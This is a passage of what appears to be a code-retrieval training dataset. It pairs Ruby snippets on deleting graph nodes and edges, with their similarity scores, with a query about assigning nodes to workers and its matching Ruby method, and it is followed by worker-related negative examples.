"def remove_nonsense_nodes\n _clear_cache\n hash = {}\n self.each_node do |node|\n hash[node] = true if @pathway.graph[node].size == 2\n end\n hash.each_key do |node|\n adjs = @pathway.graph[node].keys\n edges = @pathway.graph[node].values\n new_edge = get_edge_merged(edges[0], edges[1])\n @pathway.graph[adjs[0]].delete(node)\n @pathway.graph[adjs[1]].delete(node)\n @pathway.graph.delete(node)\n @pathway.append(Bio::Relation.new(adjs[0], adjs[1], new_edge))\n end\n #@pathway.to_relations\n @pathway.relations.reject! do |rel|\n hash[rel.node[0]] or hash[rel.node[1]]\n end\n return hash.keys\n end",
"def erase\n @nodes.erase\n end",
"def pull_edges_of(node)\n\t\t\teach_node do |other|\n\t\t\t\tremove_edge(node, other)\n\t\t\t\tremove_edge(other, node)\n\t\t\tend\n\t\tend",
"def remove_node(node)\n\t\t\tif has_node?(node)\n\t\t\t\tpull_edges_of(node)\n\t\t\t\t@nodes.delete(node)\n\t\t\t\t@order -= 1\n\t\t\tend\n\t\t\tself\n\t\tend",
"def node_remove(node)\n return unless node_present? node\n nodes.delete prepare_key(node)\n end",
"def remove_from_graph\n # Ignores trying to delete nonexistent records\n connection.execute <<-EOS\n DELETE IGNORE FROM #{oqgraph_table_name} WHERE origid = #{self.send(self.class.from_key)} AND destid = #{self.send(self.class.to_key)};\n EOS\n end",
"def remove!(node)\n super\n key_to_node.delete(node.key)\n self\n end",
"def remove(node)\n # Traverse looking for the node\n sets = []\n prev_link = nil\n each_link do |link|\n if link[:ref_id] == node.id\n sets << [prev_link, link]\n next # in case adjacent removal node links\n end\n prev_link = link\n end\n # Now we can just do the join and we're out\n sets.each do |prev_link, the_link|\n if prev_link\n prev_link[:next_id] = the_link[:next_id]\n else\n self[:head_id] = the_link[:next_id]\n end\n # Mark removal\n element_removed!\n end\n # Return the node if any were removed\n node unless sets.empty?\n end",
"def destroy\n super do\n graph.delete [source.to_term, nil, nil]\n parent.delete [parent, nil, source.to_term]\n end\n end",
"def remove_node(node)\n raise KeyError, \"Error in deleting node #{node} from Graph.\" unless @nodes.key?(node)\n\n neighbours = @adj[node]\n neighbours.each_key { |k| @pred[k].delete(node) }\n @pred[node].each_key do |k|\n @adj[k].delete(node)\n end\n\n @pred.delete(node)\n @adj.delete(node)\n @nodes.delete(node)\n end",
"def node\n purge_node[:node]\n end",
"def remove(node)\n end",
"def clear_vertex\n for rel in sorted_relations\n rel.remove(self)\n end\n\tend",
"def delete!\n graph.remove_edge element\n end",
"def delete!\n graph.remove_edge element\n end",
"def remove(name)\n lock\n read\n @inv.each_pair { |_group, nodes|\n nodes.delete(name)\n }\n save!\n unlock\n end",
"def delete!\n graph.remove_vertex self\n end",
"def eject!\n #removes the first node\n node = @store.first\n @store.remove(node.key)\n\n #get rid of the map's reference to the deleted node\n @map.delete(node.key)\n end",
"def delete_node(node)\n ## just copy the information of the next node and then cut it out\n node.id = node.next.id\n node.next = node.next.next\nend",
"def remove_edge_if #:yields: source, target, edge\n _clear_cache\n removed_rel = []\n @pathway.relations.delete_if do |rel|\n if yield rel.node[0], rel.node[1], rel.edge then\n removed_rel << rel\n true\n end\n end\n removed_rel.each do |rel|\n source = rel.node[0]\n target = rel.node[1]\n h = @pathway.graph[source]\n h.delete(target) if h\n h = @pathway.graph[target]\n h.delete(source) if h\n end\n self\n end",
"def remove_lonely_nodes\n @nodes.delete_if { |n| (@sourcelinks[n].empty? && @destlinks[n].empty?) }\n self\n end",
"def delete_edge!(from, to)\n protected_delete_edge!(from, to)\n protected_delete_edge!(to, from)\n @edge_number -= 1\n end",
"def inline\n @out.delete(self)\n @in.each do |n|\n i = 0\n while(i < n.out.length)\n n.out[i,1] = @out if n.out[i] == self\n i += 1\n end\n end\n @graph.remove(self)\n end",
"def delete(node)\n remove_node(node)\n end",
"def disconnect(edge)\n #adj_v.delete(vertex)\n in_edges.delete(edge)\n end",
"def delete_edge(from, to)\n @edges_cost[from].delete to\n @edges_up[from].delete to\n end",
"def remove(node)\n if link = Likewise::Link.find_by_id(key_for(node))\n remove_link(link)\n element_removed!\n element_decremented!(link[:weight])\n end\n node.context = link\n node\n end",
"def clear_node(node)\n if node != nil\n @visited_actors.clear\n end\n end",
"def remove_edge(id1, id2)\n # YOUR WORK HERE\n end",
"def clean_neo4j\n neo_connection.execute_query(\"START n0=node(0),nx=node(*) MATCH n0-[r0?]-(),nx-[rx?]-() WHERE nx <> n0 DELETE r0,rx,nx\")\nend",
"def delete_vertex(vertex)\n out_e = self[vertex].out_edges.to_a\n out_e.each { |e| delete_edge(vertex, e) }\n in_e = self[vertex].in_edges.to_a\n in_e.each { |e| delete_edge(e, vertex) }\n self.delete(vertex)\n end",
"def delete!\n graph.removeEdge element\n end",
"def delete_edge!(from, to)\n protected_delete_edge!(from, to)\n @edge_number -= 1\n end",
"def prune\n @set.clear\n end",
"def remove_edge(from, to)\n\t\t\t@size -= 1 if disconnect(from, to)\n\t\t\tself\n\t\tend",
"def delete\n self.class.fire_event(NodeDeletedEvent.new(self))\n relations.each {|r| r.delete}\n @internal_node.delete\n lucene_index.delete(neo_node_id)\n end",
"def forget_dependencies_for(object)\n @graph.delete_edges_to(object)\n end",
"def cleanup_phi_nodes\n nodes.dup.each do |node| # dup because we're mutating\n next unless node.is_a?(PhiNode)\n\n if node.inputs.size == 1\n # Remove phi nodes with a single input.\n connect_over(node)\n remove(node)\n elsif node.inputs.map(&:from).uniq.size == 1\n # Remove phi nodes where all inputs are the same.\n producer_edge = node.inputs.first\n consumer_edge = node.outputs.find { |e| !e.to.is_a?(MergeNode) }\n connect(\n producer_edge.from,\n consumer_edge.to,\n :data,\n consumer_edge.label\n )\n remove(node)\n end\n end\n end",
"def omit_degree_2_nodes\r\n # add all nodes into a queue\r\n # queue = put all nodes from @nodes into the queue\r\n # puts \"#{@vertices}\"\r\n queue = Queue.new\r\n @vertices.each do |node|\r\n queue << node\r\n end\r\n\r\n # iterate through all nodes until queue is not empty\r\n while ! queue.empty?\r\n # take the first node number from the queue\r\n # i = queue.deque()\r\n # take the first node itself\r\n node=queue.pop\r\n\r\n # puts \"osm_id=#{node.osm_id} degree=#{node.degree}\"\r\n # puts \"node neighbours #{node.neighbours}\"\r\n # do anything only iff this node's degree == 2\r\n if node.degree == 2\r\n # take the node's neighbours and the two edges going from the node\r\n # we would like to shrink these two edges into only one while isolating\r\n # the _node_\r\n v1_nr = node.neighbours[0]\r\n e1_nr = node.edges[0]\r\n v2_nr = node.neighbours[1]\r\n e2_nr = node.edges[1]\r\n\r\n #puts \"actual node: #{node.osm_id} , actual neighbours #{v1_nr} , #{v1_nr}\"\r\n #puts \"neigbours of #{node.osm_id}: #{v1_nr.osm_id} #{v2_nr.osm_id}\" if (node.neighbours.length==2)\r\n next if node.neighbours.length!=2\r\n\r\n # IMPORTANT!\r\n # however, if there was a cycle, which means that the node's neighbours\r\n # ARE already connected, do nothing and leave this degree-2-node _i_ as\r\n # it is!\r\n\r\n #puts \"are connected #{v1_nr}, #{v2_nr} of #{node.osm_id}?\"\r\n next if are_connected(v1_nr, v2_nr, node.osm_id)\r\n\r\n #puts \"handling #{node.osm_id} - has 2 and is not cyclic, going to delete neighbours!\"\r\n #puts \"cur_node is: #{node.osm_id}\"\r\n\r\n #puts \"# this is not needed, but just for sure: record the neighbours' degrees before the shrinkage\"\r\n #v1_deg = v1_nr.degree ; v2_deg = v2_nr.degree\r\n #puts \" -> neighbours degree: v1:#{v1_deg} v2:#{v2_deg}\"\r\n\r\n #puts \"# record the neighbours' OSM/id, for future use\"\r\n #v1_osm = v1_nr.osm_id ; v2_osm = v2_nr.osm_id\r\n #puts \" -> v1_osm: #{v1_osm} deg: #{v1_deg} :: v2_osm #{v2_osm} deg: #{v2_deg}\"\r\n\r\n #puts \"# invalidate the two edges -- particularly, do not output them into Graphviz output\"\r\n e1_nr.invalidate\r\n e2_nr.invalidate\r\n e_distance=e1_nr.time_distance+e2_nr.time_distance\r\n\r\n #puts \" -> invalidated edges - #{e1_nr} #{e1_nr.osm_from}-#{e1_nr.osm_to}(#{e1_nr.is_valid}) #{e2_nr} #{e2_nr.osm_from}-#{e2_nr.osm_to}(#{e2_nr.is_valid})\"\r\n #puts \"# disconnect the triple v1--i--v2, i.e. leave out the neighbours from\r\n # the nodes' own neighbours' lists\"\r\n #ns=[] ; v1_nr.neighbours.each do |n| ns << \"#{n.osm_id}\" end; puts \"old v1 neighbours : #{ns}\"\r\n #ns=[] ; v2_nr.neighbours.each do |n| ns << \"#{n.osm_id}\" end; puts \"old v2 neighbours : #{ns}\"\r\n #ns=[] ; node.neighbours.each do |n| ns << \"#{n.osm_id}\" end; puts \"old v neighbours : #{ns}\"\r\n\r\n node.disconnect_neighbour(v1_nr)\r\n node.disconnect_neighbour(v2_nr)\r\n v2_nr.disconnect_neighbour(node)\r\n v1_nr.disconnect_neighbour(node)\r\n node.invalidate\r\n\r\n #puts \"Disconnect edges from nodes\"\r\n #ns=[] ; v1_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \" -> old v1 neighbours : #{ns}\"\r\n #ns=[] ; v2_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \" -> old v2 neighbours : #{ns}\"\r\n v1_nr.disconnect_edge(e1_nr)\r\n v2_nr.disconnect_edge(e2_nr)\r\n\r\n #puts \" # create a new edge going from v1 into v2 (it does not matter in which direction, it is anyway an artificial/virtual edge\"\r\n # save this Edge into the array @edges\r\n v_nr = @vertices.length\r\n e = Edge.new(v1_nr.osm_id, v2_nr.osm_id, 0, v_nr, e1_nr.name, e1_nr.maxspeed, e1_nr.is_oneway, e_distance)\r\n\r\n #puts (\"new edge from #{v1_nr.osm_id} to #{v2_nr.osm_id}\")\r\n @edges.push(e)\r\n\r\n #puts \"#add edge to vertex\"\r\n #ns=[] ; v1_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \"old v1 edges : #{ns}\"\r\n #ns=[] ; v2_nr.edges.each do |n| ns << \"#{n.osm_from}-#{n.osm_to}(#{n.is_valid})\" end; puts \"old v2 edges : #{ns}\"\r\n v1_nr.add_edge(e)\r\n v2_nr.add_edge(e)\r\n\r\n #add linkeds to vetexes\r\n v1_nr.connect_neighbour(v2_nr)\r\n v2_nr.connect_neighbour(v1_nr)\r\n end\r\n end\r\n end",
"def prune\n # prune trees that aren't duped at all, or are too small\n self.hashes.delete_if { |_,nodes| nodes.size == 1 }\n self.hashes.delete_if { |_,nodes| nodes.all?(&:modified?) }\n\n if option[:liberal] then\n prune_liberally\n else\n prune_conservatively\n end\n end",
"def remove_all\n @peer.remove_all\n# @children.each { |child| scene.unindex_prop(child) } if scene\n# @children = []\n end",
"def clean(node)\n update node, false, true, nil\n end",
"def delete!\n graph.remove_vertex element\n end",
"def delete_node\n node.destroy if node\n end",
"def delete!\n graph.removeVertex element\n end",
"def clean_cached_node(node)\n Puppet::Node.indirection.destroy(node)\n Puppet.info \"#{node}'s cached node removed\"\n end",
"def clear\n @nodes = Hash.new\n @ways = Hash.new\n @relations = Hash.new\n end",
"def filter_out_nodes(nodes_list)\n new_nodes_graph = {}\n @nodes_graph.each do |node_name, node_info|\n next if nodes_list.include?(node_name)\n\n new_nodes_graph[node_name] = node_info.merge(\n connections: node_info[:connections].reject { |connected_hostname, _labels| nodes_list.include?(connected_hostname) },\n includes: node_info[:includes] - nodes_list\n )\n end\n @nodes_graph = new_nodes_graph\n end",
"def clear\n @adjacencies[:in].clear\n @adjacencies[:out].clear\n @vertex = nil\n end",
"def remove\n each { |x| x.parent.children.delete(x) }\n end",
"def remove_vertex(v)\n\t\t@Vertices.delete_at(@Hash[v.label])\n\t\tnum=num_edges-1\n\t\ti=0\n\t\twhile i != num do\n\t\t\tif @Edges[i].points[0] == v.label or @Edges[i].points[1] == v.label\n\t\t\t\t@Edges.delete_at(i)\n\t\t\t\ti=-1\n\t\t\t\tnum=num-1\n\t\t\tend\n\t\t\ti+=1\n\t\tend\n\t\trehash\n\tend",
"def removed(node)\n\t\t\t@size -= 1\n\t\t\treturn node\n\t\tend",
"def delete_old_nodes (days_to_keep = DAYS_TO_KEEP_NODE)\n children.where('updated_at < ?', Time.now - days_to_keep.day).each do |node|\n node.destroy_self_and_children!\n end\n end",
"def remove(vertex)\n return if !self.include?(vertex)\n vertex.remove_relations(self)\n super\n end",
"def remove_edge(e)\n\t\t# Delete an edge\n\t\tfor i in 0..num_edges-1\n\t\t\tif @Edges[i].points[0] == e.points[0] and @Edges[i].points[1] == e.points[1]\n\t\t\t\t@Edges.delete_at(i)\n\t\t\t\tbreak\n\t\t\telsif @Edges[i].points[1] == e.points[0] and @Edges[i].points[0] == e.points[1]\n\t\t\t\t@Edges.delete_at(i)\n\t\t\t\tbreak\n\t\t\tend\n\t\tend\n#\t\trehash\n\tend",
"def remove(x, y)\n @store[x].remove(y)\n @store[y].remove(x) if undirected?\n end",
"def remove_nodes(attr={})\n attr = {\n :threshold => 2,\n :weight => false,\n :dir => :all,\n :type => :plain\n }.merge(attr)\n\n threshold = attr[:threshold]\n weight = attr[:weight]\n dir = attr[:dir]\n plain = (attr[:type] == :plain)\n\n if b=attr[:hirsch]\n weight = :hirsch\n else\n b = 1\n end\n\n testnodes = @nodes\n delnodes = Set.new\n dellinks = Set.new\n\n finished = false\n\n while(!finished)\n ndels = if weight==:hirsch\n case attr[:dir]\n when :in\n testnodes.select { |n| !hirsch?(@destlinks[n],threshold,b) }\n when :out\n testnodes.select { |n| !hirsch?(@sourcelinks[n],threshold,b) }\n when :max\n testnodes.select { |n| !(hirsch?(@destlinks[n],threshold,b) ||\n hirsch?(@sourcelinks[n],threshold,b)) }\n when :min\n testnodes.select { |n| (!hirsch?(@destlinks[n],threshold,b) ||\n !hirsch?(@sourcelinks[n],threshold,b)) }\n else\n testnodes.select { |n| !hirsch?(@destlinks[n] + \n @sourcelinks[n],\n threshold,b) }\n end\n else\n case attr[:dir]\n when :in\n testnodes.select { |n| n_indegree(n,weight) < threshold }\n when :out\n testnodes.select { |n| n_outdegree(n,weight) < threshold }\n when :max\n testnodes.select { |n| ((n_outdegree(n,weight) < threshold) &&\n (n_indegree(n,weight) < threshold)) }\n when :min\n testnodes.select { |n| ((n_outdegree(n,weight) < threshold) ||\n (n_indegree(n,weight) < threshold)) }\n else\n testnodes.select { |n| n_degree(n,weight) < threshold }\n end\n end\n \n delnodes.merge(ndels)\n testnodes = Set.new\n \n ndels.each do |n|\n @sourcelinks[n].each { |l| \n d = l.dest \n testnodes << d\n @destlinks[d].delete(l)\n dellinks << [n,d]\n }\n @destlinks[n].each { |l| \n s = l.src\n testnodes << s\n @sourcelinks[s].delete(l)\n dellinks << [s,n]\n }\n end\n\n testnodes.subtract(delnodes) # is this faster?\n\n finished = plain || testnodes.empty?\n\n end \n\n dellinks.each { |a| @links.delete(a) }\n\n @nodes -= delnodes.to_a\n\n self\n end",
"def delete_node(current_node)\n\nend",
"def delete(rel)\n @relations.delete_if do |x|\n x === rel\n end\n @graph[rel.from].delete(rel.to)\n @graph[rel.to].delete(rel.from) if @undirected\n end",
"def disconnect_via(edge)\n @in_edges.delete(edge)\n @out_edges.delete(edge)\n\n nil\n end",
"def reduce_graph( states )\n @graph.delete_if do |state, neighbours|\n neighbours.delete_if { |neighbour| !states.include?(neighbour) }\n !states.include?(state)\n end\n end",
"def delete_node\n delete(@nodename)\n end",
"def remove_node\n remove_node_helper(@root)\n end",
"def removeAddr( node_id )\n for addr in @routing_table.keys\n if @routing_table[addr][\"node_id\"] == node_id\n @routing_table.delete([addr])\n end\n end\n end",
"def protected_delete_edge!(from, to)\n if has_edge?(from, to)\n @vertices[from].delete(to)\n @edge_labels.delete(Pair.new(from, to))\n end\n end",
"def delete_all\n neo4j_query(\"MATCH (n:`#{mapped_label_name}`) OPTIONAL MATCH (n)-[r]-() DELETE n,r\")\n end",
"def delete(nodeidentifier)\n node = @nodes[nodeidentifier]\n @nodes[nodeidentifier] = nil\n @edges.delete node\n @back_edges.delete node\n end",
"def clear\n\t\t@predecessor = nil\n\t\t@visited = false\n\t\t@node_string = \" \"\n\tend",
"def delete_node(l)\n node = Node.find_by(layer: l).destroy\n Connection.destroy_all(parent_id: node.id)\n Connection.destroy_all(child_id: node.id)\n end",
"def delete_edge(v)\n count = 0\n @edges.each do |e|\n @edges.delete_at(count)if e.vertex.eql?(v)\n count+=1\n end\n end",
"def removeAddr(node_id)\n for addr in @routing_table.keys\n if @routing_table[addr][\"node_id\"] == node_id\n @routing_table.delete([addr])\n end\n end\n end",
"def remove_edge(col, row)\n @deleted << [col, row]\n end",
"def collect_node! #:yields: node\n _clear_cache\n tr = {}\n self.each_node do |node|\n tr[node] = yield node\n end\n # replaces nodes in @pathway.relations\n @pathway.relations.each do |rel|\n rel.node.collect! { |node| tr[node] }\n end\n # re-generates @pathway from relations\n @pathway.to_list\n # adds orphan nodes\n tr.each_value do |newnode|\n @pathway.graph[newnode] ||= {}\n end\n self\n end",
"def remove_nodes!(tg,tiles)\n result = [Array.new,Array.new]\n\n tg[0].each_index {|n| # remove nodes\n tiles.each do |i|\n if i == tg[0][n][0]\n result[0].push(tg[0][n])\n tg[0][n] = nil\n break\n end \n end\n }\n tg[1].each_index {|e| # remove edges\n tiles.each do |i|\n if(tg[1][e][0] == i || tg[1][e][1] == i) \n result[1].push(tg[1][e])\n tg[1][e] = nil\n break # don't add edge twice\n end\n end\n }\n tg[0].compact!\n tg[1].compact!\n return result\nend",
"def remove(node)\n if node.parent.nil?\n @root = nil\n return\n end\n if node.parent.left == node\n node.parent.left = nil\n elsif node.parent.right == node\n node.parent.right = nil\n end\n end",
"def remove_edge(eid)\n p1, p2 = @points_of_edge[eid]\n @points_of_edge[eid] = nil\n @length_of_edge[eid] = nil\n\n @edges_of_point[p1] -= [eid]\n @edges_of_point[p2] -= [eid]\n end",
"def unlink(other)\n self.class.graph.disjoin(vertex, other.vertex)\n end",
"def forget_dependencies_for(item)\n @graph.vertices.each do |v|\n @graph.remove_edge(v, item)\n end\n end",
"def delete_node_improved(node)\n node.val = node.next.val\n node.next = node.next.next\nend",
"def collect_children_to_delete(nodes_to_delete)\n children('id').each do |c|\n nodes_to_delete << c.id\n c.collect_children_to_delete(nodes_to_delete)\n end\n end",
"def delete_this_node(node)\n node.val = node.next_node.val\n node.next_node = node.next_node.next_node\n return node\nend",
"def remove node\n # if the node is at beginning or end of list\n # handle this separately\n return remove_first if node.prev_node == nil\n return remove_last if node.next_node == nil\n\n # tell adjacent nodes to 'skip' over this node\n node.next_node.prev_node = node.prev_node\n node.prev_node.next_node = node.next_node\n\n # store the data, so we can return it\n data = node.data\n\n # send to garbage collector\n node.data = nil\n node = node.prev_node = node.next_node = nil\n\n @size -= 1\n\n return data\n end",
"def create_unvisited_set\n @unvisited_set = @nodes.map { |r| r if @table_merged[r] != \"X\" }\n @unvisited_set.delete(nil)\n @unvisited_set\n end",
"def remove_node\n cspsearchpath.delete(@label)\n end",
"def remove_node(node)\n return if !node_file(node).exist?\n\n txn do\n @repo.rm node_file(node)\n\n message = \"remove node #{node.fqn}\"\n @repo.commit message\n log << \"Database commit: #{message}\"\n end\n end",
"def karger(g)\n if g.nodes.size <= 2\n return g.edges.size\n end\n # pp \"-------------------------\"\n e = g.edges.to_a.at(rand(g.edges.size))\n # pp \"picked edge: \"\n # print_edge e\n # pp \"left edges size: #{g.edges.size}\"\n n1 = e.nodes.to_a[0]\n n2 = e.nodes.to_a[1]\n # print_edge e\n # print_node n1\n # print_node n2\n n1.edges.merge(n2.edges)\n # print_node n1\n n1.edges.delete(e)\n g.edges.delete(e)\n edges_to_be_deleted = []\n n1.edges.to_a.each do |e|\n if e.nodes.include?(n2)\n e.nodes.delete(n2)\n e.nodes.add(n1)\n end\n if e.nodes.size < 2\n edges_to_be_deleted << e\n end\n end\n # puts \"before purge:\"\n # print_node n1\n edges_to_be_deleted.each do |e|\n n1.edges.delete e\n g.edges.delete e\n end\n # puts \"after adjust node: \"\n # print_node n1\n g.nodes.delete(n2.index)\n karger(g)\nend",
"def remove_from_tree(item, node) \n return rebalance(super(item, node))\n end",
"def remove_edge(u, v)\n super\n @weights.delete([u,v])\n end",
"def prune_conservatively\n hashes_to_prune = {}\n\n # extract all subtree hashes from all nodes\n self.hashes.values.each do |nodes|\n nodes.first.all_structural_subhashes.each do |h|\n hashes_to_prune[h] = true\n end\n end\n\n # nuke subtrees so we show the biggest matching tree possible\n self.hashes.delete_if { |h,_| hashes_to_prune[h] }\n end",
"def on_remove\n @context.notifications.off(\"graph.start\", self)\n @context.notifications.off(\"graph.stop\", self)\n\n io.outputs.each { |k, o| @context.connections.delete(o.guid) }\n io.unregister_inputs\n var.unregister\n stop\n end",
"def destroy\n @node = Node.find(params[:id])\n @node.destroy\n project = Project.where(:user_id => current_user[:id]).first\n project.optimized = false\n project.loading = false\n project.save\n @nodes = Node.where(:user_id => current_user[:id])\n @nodes.each do |node|\n node.jobnumber = nil\n node.vehicle_id = nil\n node.servicetime = nil\n node.tour_id = nil\n node.save\n end\n respond_to do |format|\n format.html { redirect_to(nodes_url) }\n format.xml { head :ok }\n end\n end",
"def disconnect node1, node2\n if !nodes.include?(node1) || !nodes.include?(node2)\n raise NodeContainsException, 'The graph does not contain either ' + node1 + ' or ' + node2\n end\n @connections[node1].delete node2\n @connections[node2].delete node1\n end",
"def merge_with(node)\n raise \"Cannot merge a node with itself!\" if node == self\n @in.delete(node)\n @out.delete(node)\n node.in.each do |n|\n n.out.map! { |o| o == node ? self : o }\n end\n @out.add_all(node.out)\n @graph.start = self if @graph.start == node\n @graph.remove(node)\n end",
"def reverse_delete(result)\n edges = result[0]\n hitList = result[1]\n\n hitList.each do |k, dist|\n edges[k[0]].delete(k[-1])\n edges[k[-1]].delete(k[0])\n\n unless path_exists?(edges, k[0], k[-1]) #check if connection still path\n p \"path does not exist, reconnecting #{k[0]} to #{k[-1]} \"\n edges[k[0]][k[-1]] = dist\n edges[k[-1]][k[0]] = dist\n end\n end\n\n edges\n end",
"def remove_vertex!(vertex)\n return nil unless vertex?(vertex)\n @vertices[vertex].edges.each { |edge| remove_edge!(edge) }\n @edges -= @vertices[vertex].edges\n @vertices[vertex].clear\n @vertices.delete(vertex)\n end",
"def delete_edge(from_vertex, to_vertex)\n begin\n self[from_vertex].out_edges.delete(to_vertex)\n self[to_vertex].in_edges.delete(from_vertex)\n rescue NoMethodError => e\n err_suffix = \"in delete_edge(#{from_vertex}, #{to_vertex}).\"\n if self[from_vertex].nil?\n puts(\"No vertex with id #{from_vertex} \" << err_suffix)\n else\n puts(\"No vertex with id #{to_vertex} \" << err_suffix)\n end \n end\n end",
"def LinksToRemove\n\t\t\n\t\t#removing unwanted links\n\t\t@nodes.each do |nodeA|\n\t\t\t@nodes.each do |nodeB|\n\n\t\t\t\tif nodeA==nodeB\n\t\t\t\t\tnext\n\t\t\t\tend\n\n\t\t\t\ttempLink=Link.new(nodeA,nodeB)\n\t\t\t\trevTempLink=Link.new(nodeB,nodeA)\n\n\t\t\t\t#check if this link has been requested\n\t\t \t\treqLink=false \n\t\t \t\t@links.each do |link|\n\t\t\t \t\tif Equals(tempLink, link)\n\t\t\t \t\t\treqLink=true\n\t\t\t \t\tend\n\t\t \t\tend\n\t\t \n\t\t \t\tif not reqLink and (nodeA.type==\"R\" and nodeB.type==\"R\")\n\t\t\t\t\tputs(\"Removing link between node #{nodeA.id} and #{nodeB.id}\\n\")\n\t\t\t\t\t@killedLinks << tempLink\n\t\t \t\tend\n\n\n\t\t\tend\n\t\tend \n\n\t\treturn @killedLinks\n\n\tend",
"def clear_node\n self.value = nil\n self.left_child = nil\n self.right_child = nil\n end"
] |
[
"0.7532265",
"0.70715094",
"0.70563966",
"0.69391334",
"0.69204074",
"0.6869052",
"0.67679524",
"0.6723454",
"0.6667144",
"0.66671157",
"0.6653908",
"0.6612068",
"0.66102505",
"0.6605932",
"0.65623885",
"0.6544049",
"0.6544049",
"0.6488497",
"0.6462139",
"0.6447844",
"0.64476967",
"0.6432469",
"0.63991106",
"0.6398748",
"0.6363964",
"0.6356087",
"0.6337634",
"0.63222283",
"0.6321797",
"0.62989736",
"0.62811285",
"0.6275145",
"0.62732744",
"0.6271137",
"0.62633497",
"0.62451637",
"0.6237287",
"0.622459",
"0.62226546",
"0.6215864",
"0.6212267",
"0.6208622",
"0.62085897",
"0.6204139",
"0.6195986",
"0.6193758",
"0.6174084",
"0.6173676",
"0.6161887",
"0.61611694",
"0.6139803",
"0.6129755",
"0.6117151",
"0.611002",
"0.6090646",
"0.60773224",
"0.60743326",
"0.60632354",
"0.6037756",
"0.6017959",
"0.600252",
"0.60025054",
"0.59990066",
"0.5995176",
"0.5991342",
"0.5983294",
"0.5982925",
"0.5979202",
"0.5970241",
"0.5962269",
"0.59564316",
"0.59505546",
"0.5948514",
"0.5944791",
"0.5930039",
"0.5929553",
"0.5918265",
"0.59081703",
"0.589476",
"0.5890514",
"0.5885892",
"0.587494",
"0.5862603",
"0.5856659",
"0.58554363",
"0.5853729",
"0.5836945",
"0.5816846",
"0.5812647",
"0.58049655",
"0.57891",
"0.57792264",
"0.5774953",
"0.57658666",
"0.5765664",
"0.5764324",
"0.5756609",
"0.5751132",
"0.57427627",
"0.57415134"
] |
0.72997206
|
1
|
First assign nodes to workers, and then count the seconds off each worker
|
def process_second
@seconds += 1
assign_nodes
process_workers
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def workers(count); end",
"def worker_count\n @action == 'run' ? 1 : workers\n end",
"def active_on_cluster_count\n (waiting_count + running_count)\n end",
"def worker_count()\n @workers.size\n end",
"def worker_count()\n @workers.size\n end",
"def missing_workers\n @options[:process_count] - @workers.length\n end",
"def workers\r\n @workers ||= []\r\n end",
"def worker_number=(worker_num); end",
"def excess_task_workers\n @task_worker_lock.synchronize do\n @task_worker_size - @task_workers.size - @spawnings\n end\n end",
"def concurrent_count\n debug(\"Getting puppet status\")\n\n running = 0\n\n @puppet.status do |resp|\n begin\n running += resp[:body][:data][:running].to_i\n rescue Exception => e\n debug(\"Failed to get node status: #{e}, continuing\")\n end\n end\n\n running\nend",
"def workers\n @@workers ||= []\n end",
"def assign_node(char)\n assigned = false\n @worker_obj.each do |k, node|\n break if assigned\n unless node\n @worker_obj[k] = [char, NUM_TO_INT_MAP[char] + ADDITIONAL_SECONDS]\n @nodes_being_worked_on << char\n assigned = true\n end\n end\n end",
"def compute_workers(ncpus)\n return 0 unless Process.respond_to?(:fork)\n\n compute_workers_from_env(LISTENER_WORKERS) ||\n compute_workers_from_env(PUMA_WORKERS) ||\n ncpus * PUMA_WORKERS_CPUMULT\n end",
"def thread_count\n @worker_threads_count.value\n end",
"def busy_workers\n if @threadsafe\n 0\n else\n @workers.size - @worker_queue.size\n end\n end",
"def method()\n @workers.size\n end",
"def workers_to_start(workers_to_start)\n if not worker_pids.empty?\n worker_pids.each do |worker_pid|\n if worker_alive?(worker_pid)\n @number_of_workers += 1\n workers_to_start -= 1\n else\n mark_worker_as_stopped(worker_pid)\n end\n return 0 if workers_to_start < 1\n end\n end\n return workers_to_start\n end",
"def worker_threads\n @workers.synchronize { @workers.size }\n end",
"def get_njobs(nodes)\n\n # Reset job count on each input node\n nodes.each do |wn|\n wn[:njobs] = -1\n end\n\n begin\n pbsnodes_xml = REXML::Document.new( %x[ #{$cmd_pbsnodes} 2> /dev/null ] )\n rescue\n return\n end\n\n return if pbsnodes_xml.elements.empty?\n\n pbsnodes_xml.elements.each('//Data/Node') do |node_xml|\n\n name = node_xml.elements['name'].text\n is_offline = node_xml.elements['state'].text.include?('offline')\n is_down = node_xml.elements['state'].text.include?('down')\n\n jobs_xml = node_xml.elements['jobs']\n if jobs_xml\n njobs = jobs_xml.text.split(' ').length\n else\n njobs = 0\n end\n\n # Find matching input nodes: FQDN must be set, node must be up and offline\n nodes.each do |wn|\n next unless wn[:fqdn] and wn[:fqdn] == name and is_offline and !is_down\n wn[:njobs] = njobs\n end\n\n end\n\nend",
"def worker_check_interval(interval); end",
"def murder_lazy_workers\n next_sleep = @timeout - 1\n now = Time.now.to_i\n WORKERS.dup.each_pair do |wpid, worker|\n tick = worker.tick\n 0 == tick and next # skip workers that haven't processed any clients\n diff = now - tick\n tmp = @timeout - diff\n if tmp >= 0\n next_sleep > tmp and next_sleep = tmp\n next\n end\n next_sleep = 0\n logger.error \"worker=#{worker.number} PID:#{wpid} timeout \" \\\n \"(#{diff}s > #{@timeout}s), killing\"\n kill_worker(:KILL, wpid) # take no prisoners for timeout violations\n end\n next_sleep <= 0 ? 1 : next_sleep\n end",
"def murder_lazy_workers\n next_sleep = @timeout - 1\n now = Time.now.to_i\n WORKERS.dup.each_pair do |wpid, worker|\n tick = worker.tick\n 0 == tick and next # skip workers that haven't processed any clients\n diff = now - tick\n tmp = @timeout - diff\n if tmp >= 0\n next_sleep > tmp and next_sleep = tmp\n next\n end\n next_sleep = 0\n logger.error \"worker=#{worker.nr} PID:#{wpid} timeout \" \\\n \"(#{diff}s > #{@timeout}s), killing\"\n kill_worker(:KILL, wpid) # take no prisoners for timeout violations\n end\n next_sleep <= 0 ? 1 : next_sleep\n end",
"def calc_final_desired_workers\n required_workers = 0\n @worksets.each do |workset|\n required_workers += workset[0] if workset && workset[0]\n end\n required_workers = [required_workers, @max_workers].min\n required_workers = [required_workers, @min_workers].max\n required_workers\n end",
"def worker_pool; end",
"def worker_pool; end",
